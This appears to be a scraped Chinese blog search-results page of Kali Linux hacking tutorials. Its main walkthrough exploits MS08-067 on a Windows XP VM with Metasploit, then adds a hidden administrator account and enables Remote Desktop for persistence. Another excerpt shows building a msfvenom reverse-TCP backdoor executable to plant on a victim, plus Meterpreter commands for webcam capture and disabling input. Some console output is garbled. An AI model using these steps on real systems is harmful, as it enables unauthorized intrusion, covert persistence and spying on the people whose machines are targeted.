精华内容
下载资源
问答
  • OS: Kali on the Windows Linux Subsystem <p>Airgeddon fails to detect a graphical interface on the Kali Windows Subsystem even after the installation of a graphical interface. The script also fails ...
  • kali windows双系统安装!

    2016-03-08 23:17:40
     我直接复制文章中的也没有对应kali版本 ) 注意:如果安装系统的时候出现 安装时光盘挂载不成功,出现无法挂载识别光盘镜像的问题   这个解决也是我从别的 博客 中找到的。就贴在这,防止以后又会遇到 ...

    制作U盘启动参考的:http://www.myhack58.com/Article/48/65/2015/62627.htm

    装系统参考了上面的连接还有参考了这个文章:http://xiao106347.blog.163.com/blog/static/21599207820134219466752/

    用mbr引动grub参考的是http://xiao106347.blog.163.com/blog/static/2159920782013124105954667/   的EasyBCD添加ubuntu启动项

    (添加方法:title....    我直接复制文章中的也没有对应kali版本)

    注意:如果安装系统的时候出现

    • 安装时光盘挂载不成功,出现无法挂载识别光盘镜像的问题
    •   这个解决也是我从别的博客中找到的。就贴在这,防止以后又会遇到       

             安装kali2.0过程中,安装界面(就是选择语言,设置用户名密码,分区等引导的界面)倒数第二个会有个execute a shell选项。

             选择execute a shell后,会有执行shell的窗口。

             第一步:df -m

             此时会看到挂载信息,最下面的是/dev/xyz  /media

             这个是U盘设备挂载到了/media,导致cd-rom不能被挂载。

             第二步:umount  /media

            上面那个国外的解决方案还要继续mount  /dev/xyz  /cd-rom

            但本机测试不用自己挂载,安装程序会自己挂载。自己挂载反而会引起后面出现GRUB安装失败。

            第三步:exit

            退出命令窗口后,继续安装。

     

    展开全文
  • 通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞。因为很多教程只说了用什么漏洞去攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体化在笔记本电脑...

    通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞。因为很多教程只说了用什么漏洞去攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体化在笔记本电脑上)

    • 一.工具介绍

    namp 一款可以探测主机的基本信息的扫描工具,数据包中包含扫描主机的开启端口,端口使用的服务,和一些系统信息。
    msf一个极为强大的漏洞利用工具不管是系统漏洞,还是软件服务漏洞。MSF基本都有较为强大的漏洞数据库来匹配

    • 二.创建攻击组织,搭建网络实验环境

    Kali IP地址 10.117.12.221 (Kali连接的是WIFI)
    入侵目标 IP地址 10.117.0.15
    本教程给的是跨网段去探测主机漏洞,如果Nmap在扫描网段主机时扫描不到存活主机请设置系统防火墙或者是杀毒软件

    • 通过Nmap专项扫描目标主机存在系统漏洞(只能系统漏洞利用)

    打开终端输入 nmap --script = vuln ip (扫描指定IP主机存在的系统漏洞)
    因为我要扫描10.117.0.15的目标主机存在的漏洞所以代码是
    nmap --script = vuln 10.117.0.15
    这时过一会就会出现该系统存在一些漏洞
    在这里插入图片描述
    显示host script results就是该主机存在的漏洞

    • 通过msf数据库查找此系统漏洞

    search 该主机漏洞名称
    因为我主机存在很多漏洞我就随便挑一个ms10-054漏洞
    search ms10-054 回车
    就出现了所有MSF数据库中的关于ms10-054的漏洞
    在这里插入图片描述

    • 使用nmap深度扫描目标系统的软件漏洞(只能用于软件漏洞的利用)

    nmap -T4 -A -v IP (深度扫描指定IP主机的全部信息)
    因为我要扫描的主机是10.117.0.15
    所以代码是nmap -T4 -A -v 10.117.0.15
    不过一会系统的所有信息就出来了,但是我们只需要看白色PROT 端口信息部分就行了它能显示什么端口开着什么服务
    在这里插入图片描述
    举个例子我要用135端口开启的Microsoft Windows RPC服务去实现软件服务漏洞利用
    我就得打开msf
    去输入search Microsoft Windows RPC (关于Microsoft Windows RPC的软件服务漏洞)
    然后会出现很多的关于Microsoft Windows RPC的软件漏洞在这里插入图片描述

    • 注意:这就是通过nmap去扫描指定IP存在的软件漏洞和系统漏洞,但这仅仅是该系统存在该软件或者是系统漏洞,至于该漏洞里面的漏洞利用尽量选great级别的漏洞,然后再去一个一个调用查看是否数据库中下的该漏洞可以被利用。
    展开全文
  • Kali Windows 作为安全从业人员,Kali都是必备工具箱,一款作为黑客常用工具的集合平台深受安全人员喜欢。但是Kali是从BT5转变而来,所以是基于Linux系统集成的。作为很多工控安全从业者因为都是使用Windows平台来做...
  • kali入侵windows

    千次阅读 2017-12-15 06:36:53
    因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门。 ####实验环境 ![实验环境.jpg]...

    因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门。


    ####实验环境 ![实验环境.jpg](http://upload-images.jianshu.io/upload_images/4976516-daae4fea5636c8d4.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

    ####试验工具 kaili linux 百度百科 其预装了许多试验工具,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。
    Metasploit 百度百科 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。


    ###知识点综述 1.0 熟悉虚拟机vmware的相关知识,因为本环境是在VM中进行的,需要安装kaili linux和windows xp,以及设计虚拟机网络,其可以参考文章:[vmware14.0知识点手册](http://www.jianshu.com/p/91c409b8ce79). 2.0 计算机网络相关知识点。 **2.1 vmware的虚拟网络** >与物理交换机相似,虚拟交换机也能将网络连接组件连接在一起。虚拟交换机又称为虚拟网络,其名称为VMnet0、VMnet1、VMnet2,以此类推。有少量虚拟交换机会默认映射到特定网络。

    桥接模式网络连接 桥接模式网络连接通过使用主机系统上的网络适配器将虚拟机连接到网络

    NAT 模式网络连接 使用 NAT 模式网络时,虚拟机在外部网络中不必具有自己的 IP 地址。主机系统上会建立单独的专用网络。

    仅主机模式网络连接 仅主机模式网络连接可创建完全包含在主机中的网络。

    2.2 IP(这里是ipv4)地址分类,网络类型。

    ip地址,由《net-id,host-id》二部分组成。根据网络号的位数,把ip划分为A,B,C,D,E几大类,其中A类(0,127),B类(128,191),C类(192,223)

    3.0 VMWare虚拟机提供的桥接、nat和主机模式的区别

    所以本次试验的虚拟机网络采用桥接方式,所以主要介绍下桥接。
    bridged(桥接模式) 在这种模式下,VMWare虚拟出来的操作系统就像是局域网中的一台独立的主机,它可以访问网内任何一台机器。 在桥接模式下,因为是独立的主机系统,那么就需要为虚拟系统配置IP、子网掩码。 使用桥接模式的虚拟系统和宿主机器的关系,就像连接在同一个Hub上的两台电脑。想让它们相互通讯,你就需要为虚拟系统配置IP地址和子网掩码,否则就无法通信。而且还要和宿主机器处于同一网段,这样虚拟系统才能和宿主机器进行通信。


    ###重要细节 1.0 **因为在vmware模拟kaili入侵windows xp所以要保证这二台虚拟机可以通信,试验的vmware采用桥接网络,二台虚拟机相当于独立的主机,在vmware想要通信,必须处于同一网段(就是网络号要一样),二台主机设置kaili设置为192.168.201.133,windows xp设置为192.168.201.135,它们是C类ip,前3位是网络号,都是192.168.201相同,可以通信,可以采用ping命令进行。** 2.0 **为了试验效果明显,最好关闭掉windows的防火墙,这样入侵更容易,而且自己原本的主机把杀毒软件也关闭了。**
    ###入侵开始 **1.0 查看linux的ip地址** ``` root@kali:~# ifconfig eth0: flags=4163 mtu 1500 inet 192.168.201.133 netmask 255.255.255.0 broadcast 192.168.201.255 inet6 fe80::20c:29ff:fecc:87cf prefixlen 64 scopeid 0x20 ether 00:0c:29:cc:87:cf txqueuelen 1000 (Ethernet) RX packets 30 bytes 2530 (2.4 KiB) RX errors 0 dropped 5 overruns 0 frame 0 TX packets 51 bytes 3303 (3.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 52 bytes 3756 (3.6 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 52 bytes 3756 (3.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    >**这里可以看出我的ip地址为192.168.201.133。如果想要修改ip地址可以采用 ifconfig eth0 192.168.201.136 命令**<br>
    **其中127.0.0.1 127.0.0.1是[回送地址](https://baike.baidu.com/item/%E5%9B%9E%E9%80%81%E5%9C%B0%E5%9D%80),指本地机,一般用来测试使用。回送地址(127.x.x.x)是本机回送地址(Loopback Address),即[主机](https://baike.baidu.com/item/%E4%B8%BB%E6%9C%BA)IP[堆栈](https://baike.baidu.com/item/%E5%A0%86%E6%A0%88)内部的IP地址,主要用于网络软件测试以及本地机[进程间通信](https://baike.baidu.com/item/%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1),无论什么程序,一旦使用回送地址发送数据,协议软件立即返回,不进行任何网络传输。**
    
    **2.0 ping命令,测试linux和windows是否可以通信**
    复制代码

    root@kali:~# ping -c 2 192.168.201.135 PING 192.168.201.135 (192.168.201.135) 56(84) bytes of data. 64 bytes from 192.168.201.135: icmp_seq=1 ttl=128 time=13.5 ms 64 bytes from 192.168.201.135: icmp_seq=2 ttl=128 time=0.395 ms

    --- 192.168.201.135 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1002ms rtt min/avg/max/mdev = 0.395/6.986/13.578/6.592 ms

    **linux的ping和windows有所不同,如果不设置次数会一直ping下**去。
    复制代码

    root@kali:~# ping Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface] [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos] [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] [hop1 ...] destination

    **3.0 开启SQL数据库服务**
    复制代码

    root@kali:~# service postgresql start

    **4.0 终端执行msfconsole 命令**
    复制代码

    root@kali:~# msfconsole

    cowsay++


    < metasploit >

       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
    
    
       =[ metasploit v4.16.6-dev                          ]
    复制代码
    • -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
    • -- --=[ 498 payloads - 40 encoders - 10 nops ]
    • -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    >**使用help命令查看其参数和用法**
    复制代码

    msf > help

    Core Commands

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    irb           Drop into irb scripting mode
    load          Load a framework plugin
    quit          Exit the console
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers
    复制代码

    Module Commands

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    edit          Edit the current module with the preferred editor
    info          Displays information about one or more modules
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Selects a module by name
    复制代码

    Job Commands

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job
    复制代码

    Resource Script Commands

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file
    复制代码

    Database Backend Commands

    Command           Description
    -------           -----------
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces
    复制代码

    Credentials Backend Commands

    Command       Description
    -------       -----------
    creds         List all credentials in the database
    复制代码
    **5.0 运行search netapi命令搜索netapi,在metasploip框架中列出所有与netapi相关的漏洞利用代码**
    复制代码

    msf > search netapi

    Matching Modules

    Name Disclosure Date Rank Description


    exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

    >**可以看到最后一个漏洞利用代码的评级为great,所以优先使用ms08_067_netapi。**
    **show tagrgets可以查看攻击平台**
    **show opinions可以查看攻击需要设置那些参数**
    **show payloads可以查看使用的攻击载荷**
    
    **6.0使用 use exploit/windows/smb/ms08_067_netapi ,设置参数**
    复制代码

    msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > set rhost 192.168.201.135 rhost => 192.168.201.135 msf exploit(ms08_067_netapi) > check [+] 192.168.201.135:445 The target is vulnerable. msf exploit(ms08_067_netapi) > set lhost 192.168.201.133 lhost => 192.168.201.133 msf exploit(ms08_067_netapi) > set target 34 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports payload => windows/meterpreter/reverse_tcp_allports

    msf exploit(ms08_067_netapi) > exploit [] Started reverse TCP handler on 192.168.201.133:1 [] 192.168.201.135:445 - Attempting to trigger the vulnerability... [] Sending stage (179267 bytes) to 192.168.201.135 [] Meterpreter session 1 opened (192.168.201.133:1 -> 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800

    >**set rhost是设置目标主机ip**
    **setset lhost设置本机ip**
    **set payload设置攻击载荷**
    **exploit,是实行攻击,如果成功,会得到一个session,可以使用meterpreter模板进一步提取**
    
    **7.0 输入shell,获取受控zhuji的shel,我这里是windows的dos。**
    复制代码

    meterpreter > shell Process 1968 created. Channel 1 created. Microsoft Windows XP [锟芥本 5.1.2600] (C) 锟斤拷权锟斤拷锟斤拷 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>net user ztg 123456 /add net user ztg 123456 /add 锟绞伙拷锟窖撅拷锟斤拷锟节★拷

    锟斤拷锟斤拷锟斤拷 NET HELPMSG 2224 锟皆伙拷锟矫革拷锟斤拷锟侥帮拷锟斤拷锟斤拷

    C:\WINDOWS\system32>net localgroup administrators ztg /add net localgroup administrators ztg /add 锟斤拷锟斤拷系统锟斤拷锟斤拷 1378锟斤拷

    锟斤拷锟斤拷锟绞伙拷锟斤拷锟斤拷锟角憋拷锟斤拷锟斤拷锟侥筹拷员锟斤拷

    C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

    锟斤拷锟斤拷锟缴癸拷锟斤拷锟斤拷

    C:\WINDOWS\system32>netstat -an netstat -an

    Active Connections

    Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING TCP 192.168.201.135:139 0.0.0.0:0 LISTENING TCP 192.168.201.135:1031 192.168.201.133:1 ESTABLISHED UDP 0.0.0.0:445 :
    UDP 0.0.0.0:500 :
    UDP 0.0.0.0:4500 :
    UDP 127.0.0.1:123 :
    UDP 127.0.0.1:1025 :
    UDP 127.0.0.1:1900 :
    UDP 192.168.201.135:123 :
    UDP 192.168.201.135:137 :
    UDP 192.168.201.135:138 :
    UDP 192.168.201.135:1900 :

    C:\WINDOWS\system32>ipconfig -all ipconfig -all

    Windows IP Configuration

        Host Name . . . . . . . . . . . . : dflx
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
    复制代码

    Ethernet adapter 锟斤拷锟斤拷锟斤拷锟斤拷:

        Connection-specific DNS Suffix  . : 
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-04-23-53
        Dhcp Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.201.135
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 
    复制代码
    >**进入windows界面,dos大神可以畅通无阻了,不过如果喜欢windows界面,可以安装上面的方法,进行操作,在远程桌面。**
    ```C:\WINDOWS\system32>net user ztg 123456 /add
    net user ztg 123456 /add
    复制代码

    添加一个用户名为ztg,密码123456

    C:\WINDOWS\system32>net localgroup administrators ztg /add
    net localgroup administrators ztg /add
    复制代码

    把ztg添加到管理员用户组

    C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    复制代码

    是手动开启3389(远程桌面连接端口)


    >#####在利用远程桌面,登陆别人的电脑,进行相关的操作了。告诉你一个小细节,在目标机中会出现你建立的管理员账号喔,可以多少远程登录了,只要对方没有发现。 **有没有人来黑我一下啊(捂嘴笑)。我的ip:127.0.0.1,系统是windows 10 64位家庭版。** >哎,这几天没有跑步,今天早上终于跑了,感冒了一整个十月,现在还在感冒中,哭死,哭死。
    展开全文
  • 使用kali入侵windows教程

    千次阅读 多人点赞 2020-03-20 08:44:14
    使用kali入侵windows教程 msf渗透 : 准备kali虚拟机 准备要入侵的windows电脑 好像没了 首先生成后门程序 进入kali后,打开终端 msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的kali IP] lport=[端口]...

    使用kali入侵windows教程

    msf渗透 :

    1. 准备kali虚拟机
    2. 准备要入侵的windows电脑
    3. 好像没了
    首先生成后门程序
    1. 进入kali后,打开终端

      msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的kali IP] lport=[端口] -f exe > 文件路径以及文件名

      举个栗子:

      msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.14 lport=5351 -f exe > msf.exe

    2. 将生成的后门程序放置到要入侵的windows电脑上(具体怎么放有很多种方法…)

    接下来我们部署msf
    1. 进入msfconsole
    2. use exploit/multi/handler
    3. set payload windows/meterpreter/reverse_tcp
    4. set lhost [你的Kali IP]
    5. set lport [端口]
    6. exploit
    大功告成,静等鱼上钩吧。。。

    Meterpreter :

    鱼上钩之后,kali会有提示,并进入meterpreter终端

    下面是meterpreter基础命令:

    系统常用命令:
    命令 说明
    sessions -i <ID值> #进入会话 -k 杀死会话
    background #将当前会话放置后台
    run #执行已有的模块,输入run后按两下tab,列出已有的脚本
    info #查看已有模块信息
    getuid # 查看权限
    getpid # 获取当前进程的pid
    sysinfo # 查看目标机系统信息
    ps # 查看当前活跃进程
    kill <PID值> 杀死进程
    idletime #查看目标机闲置时间
    reboot / shutdown #重启/关机
    shell #进入目标机cmd shell
    sessions #sessions –h 查看帮助
    uictl开关鼠标/键盘:
    命令 说明
    uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
    uictl disable mouse #禁用鼠标
    uictl disable keyboard #禁用键盘
    webcam获取远程摄像头:
    命令 说明
    webcam_list #查看摄像头
    webcam_snap #通过摄像头拍照
    webcam_stream #通过摄像头开启视频

    未完待续…

    展开全文
  • 起序:每次使用虚拟机打开 Kali 都是那么煎熬,所以为了方便可以使用 Kali 中工具功能,孤陋寡闻了,竟然才发现还可以安装子系统的功能。关谷神奇:活到老,学到老。 一、安装 适用于 Linux 的 Windows 子系统 是 ...
  • 双启动KaliWindows

    2019-02-27 09:27:47
    Kali Linux双启动WindowsWindows安装的同时安装Kali非常有用。但是,您需要在设置过程中谨慎行事。首先,确保您已备份Windows安装上的所有重要数据。由于您将修改硬盘驱动器,因此您需要将此备份存储在外部媒体上...
  • KaliWindows双引导 把KaliWindows装在一起很有用.然而,你要谨慎的安装.首先确保你已经备份了你电脑里的重要数据.因为我们要修改你的硬盘,所以你应该把数据备份到别的媒介.一旦你完成了备份,我们推荐你阅读硬盘...
  • 距离上一次IRTeam发布ICS windows v1.0已经差不多一年了,根据很多安全小伙伴的要求,发布更新版本基于原来的kali windows v1.1,更新了Windows 10 1909版本,同时增加了一些工具并加入一些ICS攻击工具。这是一种为...
  • 模拟机:kali windows2003 两台虚拟机能ping通 1.在windows2003创建用户和密码 2.在kali测试两台模拟机的连通性 3.创建字典 使用crunch创建字典 4.扫描端口,由开放的端口决定由什么协议·进行攻击 smb:445端口 ...
  • 4.一个可以与kali通信的靶机:windows 10 (ip未知) 首先,我们得准备一下我们的鱼饵:hacker.exe 我们先在kali里精心制作一下鱼饵!: #:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168
  • Kali+Windows引导修复

    千次阅读 2018-10-03 12:18:59
    问题:由于Windows更新导致Linux引导丢失 工具:kali系统U盘一个 制作kali系统盘 工具: Win32 Disk Imager unetbootin kali-iso文件 U盘-8G以上 步骤: 打开win32,选择U盘,选择iso文件,勾选MD5,然后写入...
  • DVWA搭建(kali+Windows

    2020-10-24 13:30:16
    DVWA搭建(kali+WindowsWindows搭建过程Kali搭建过程 Windows搭建过程 Windows搭建过程我是跟着B站up鱼蛋代码来做的 附上网站https://www.bilibili.com/video/BV1Zt411H7uk/ 但是在做的时候还是有一些小错误。 ...
  • Kali渗透Windows Server 2003

    千次阅读 2018-11-12 13:30:04
    kali ip 192.168.18.128 windows ip 192.168.18.133 1)首先先扫描一下靶机 nmap -sS -sV -O -Pn 192.168.18.133 其中sS是半开放扫描,sV是扫描版本号,O是扫描操作系统,Pn是不进行ping,会快一点。 可以看到有...
  • Kali Linux Windows Penetration Testing 英文azw3 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
  • KaliWindows装在一起很有用.然而,你要谨慎的安装.首先确保你已经备份了你电脑里的重要数据.因为我们要修改你的硬盘,所以你应该把数据备份到别的媒介.一旦你完成了备份,我们推荐你阅读硬盘安装Kali Linux,以了解...
  • kali渗透windowsXP过程

    2019-09-25 20:53:12
    这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址...
  • 提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉...实施利用Kali Linux对Windows7 SP1进行永恒之蓝操作 所以操作将在虚拟机上完成。...
  • kaliWindows10双系统

    千次阅读 2019-04-23 22:12:46
    物理机上的kali系统 ...本来要搭建网盘的,因为我申请芝加哥教育... 安装之前用DiskGenius看一下电脑的硬盘是不是GUID格式,不是的话下载DiskGenius进行重新分区,分区必须创建ESP分区跟MSR分区,这个是windows系统跟...
  • 在安装kali双系统的时候前,请先把windows10安装好。(重点:如果有PE的一定要把PE删掉) 安装前的准备 kali的镜像。(可自行百度,或者在官网下载) 一个8G或者以上内存的U盘。 下载UltraISO进行制作U盘启动...
  • windows kali子系统

    千次阅读 2018-10-25 20:57:06
    Microsoft Store下搜索kali: 未安装Windows子系统支持 解决办法: 1.win+x,选择Windows PowerShell(管理员) 2.输入: Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-...
  • Kali-windows 登录密码

    2019-09-02 18:02:21
    密码:abdal

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 3,114
精华内容 1,245
关键字:

kaliwindows